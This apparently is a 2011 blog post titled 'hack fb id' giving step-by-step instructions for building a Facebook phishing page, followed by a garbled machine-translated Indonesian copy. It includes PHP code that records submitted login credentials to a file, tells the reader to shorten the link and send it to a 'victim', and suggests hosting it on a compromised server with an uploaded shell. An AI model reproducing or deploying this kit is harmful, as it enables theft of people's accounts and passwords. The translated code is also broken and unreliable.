17 November 2011

hack fb id

1) Go to facebook, and copy the source of login page to notepad. 

2) Press Control + F
3) Search for action
4) You should get: action=www.facebook.com/login
5) Replace it with post.php
6) Beside action you will see something saying: method=post
7) change “post” to “get” save the file, name it: index.php and save it to desktop but remember! where it says: “save as type” change it to “all files” this is very important
9) make a new file in notepad, and put this code:

header(”Location: http://www.Facebook.com/login.php “);
$handle = fopen(”passes.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
10) Save it as post.php and remember the save as file type to all files.
11) Make a new file in notepad, dont write anything, save it as: passes.txt
12) Upload all of them in a web hosting server.
13) Make the index.php url into tinyurl.com and send it to ur victim.

Most of the free web hosting servers donot allow phishing as it is against their TOS try hosting them on a server where you have a shell uploaded.

1) Pergi ke facebook, dan menyalin sumber halaman login ke notepad.

2) Kontrol Tekan + F
3) Cari untuk aksi
4) Anda harus mendapatkan: action = www.facebook.com / login
5) Ganti dengan post.php
6) Selain tindakan Anda akan melihat sesuatu berkata: metode = posting
7) mengubah "post" untuk "mendapatkan" menyimpan file, nama: index.php dan simpan ke desktop tapi ingat! yang mengatakan: "save as type" mengubahnya menjadi "semua file" ini sangat penting
9) membuat file baru di notepad, dan masukkan kode ini:
header ("Location: http://www.Facebook.com/login.php");
$ handle = fopen ("passes.txt", "a");
foreach ($ _GET sebagai $ nilai variabel> $ =) {
fwrite ($ handle, $ variabel);
fwrite ($ handle, "=");
fwrite ($ handle, $ nilai);
fwrite ($ handle, "\ r \ n");
}
fwrite ($ handle, "\ r \ n");
fclose ($ handle);
keluar;
?>
10) Simpan sebagai post.php dan mengingat simpan sebagai jenis file untuk semua file.
11) Buat file baru di notepad, jangan menulis apa-apa, simpan sebagai: passes.txt
12) Upload semua dari mereka di server web hosting.
13) Membuat url index.php ke tinyurl.com dan mengirimkannya kepada korban ur.

Sebagian besar web hosting gratis server donot memungkinkan phishing seperti itu terhadap TOS mereka mencoba hosting di server mereka di mana Anda memiliki shell upload.

No comments: